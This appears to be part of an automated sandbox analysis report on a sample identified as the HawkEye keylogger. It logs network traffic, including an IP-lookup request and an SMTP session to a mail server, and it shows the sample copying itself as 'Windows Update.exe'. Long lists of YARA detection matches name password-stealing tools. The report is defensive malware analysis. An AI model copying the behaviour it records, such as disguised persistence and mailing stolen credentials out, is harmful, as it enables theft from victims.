                                                                                            Dec 7, 2021 18:17:50.789781094 CET8.8.8.8192.168.2.50xa183No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                            Dec 7, 2021 18:18:09.558381081 CET8.8.8.8192.168.2.50x3860No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • whatismyipaddress.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.549751104.16.155.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 7, 2021 18:17:50.871639013 CET863OUTGET / HTTP/1.1
                                                                                            Host: whatismyipaddress.com
                                                                                            Connection: Keep-Alive
                                                                                            Dec 7, 2021 18:17:50.901212931 CET864INHTTP/1.1 403 Forbidden
                                                                                            Date: Tue, 07 Dec 2021 17:17:50 GMT
                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                            Content-Length: 16
                                                                                            Connection: keep-alive
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Referrer-Policy: same-origin
                                                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                            Set-Cookie: __cf_bm=nPhtfuKxYyjGLb17cnOMiRcfLWZkAYSylJ_4tWGJvsI-1638897470-0-AeeMaTLcClFuMkrEhsDP2NYk7ySOraaBkkWDTNnL+xjrSfjvEI6kvtx4e8naTR8mQS8tzHgtAM3Fu23Ag4Cpeiw=; path=/; expires=Tue, 07-Dec-21 17:47:50 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 6b9f68e8fbc9432d-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                            Data Ascii: error code: 1020


                                                                                            SMTP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Dec 7, 2021 18:18:09.881150961 CET5874976566.29.159.53192.168.2.5220 PrivateEmail.com prod Mail Node
                                                                                            Dec 7, 2021 18:18:09.882308960 CET49765587192.168.2.566.29.159.53EHLO 088753
                                                                                            Dec 7, 2021 18:18:10.040832996 CET5874976566.29.159.53192.168.2.5250-mta-05.privateemail.com
                                                                                            250-PIPELINING
                                                                                            250-SIZE 81788928
                                                                                            250-ETRN
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-ENHANCEDSTATUSCODES
                                                                                            250-8BITMIME
                                                                                            250-CHUNKING
                                                                                            250 STARTTLS
                                                                                            Dec 7, 2021 18:18:10.042723894 CET49765587192.168.2.566.29.159.53STARTTLS
                                                                                            Dec 7, 2021 18:18:10.201702118 CET5874976566.29.159.53192.168.2.5220 Ready to start TLS

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            Analysis Process: 5.exe PID: 1928 Parent PID: 6032

                                                                                            General

                                                                                            Start time:18:17:20
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Users\user\Desktop\5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\5.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:852277 bytes
                                                                                            MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: 5.exe PID: 1060 Parent PID: 1928

                                                                                            General

                                                                                            Start time:18:17:22
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Users\user\Desktop\5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\5.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:852277 bytes
                                                                                            MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: Windows Update.exe PID: 5844 Parent PID: 1060

                                                                                            General

                                                                                            Start time:18:17:38
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:852277 bytes
                                                                                            MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 31%, ReversingLabs
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: Windows Update.exe PID: 6244 Parent PID: 5844

                                                                                            General

                                                                                            Start time:18:17:41
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:852277 bytes
                                                                                            MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.350262579.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.350302983.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.391554115.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
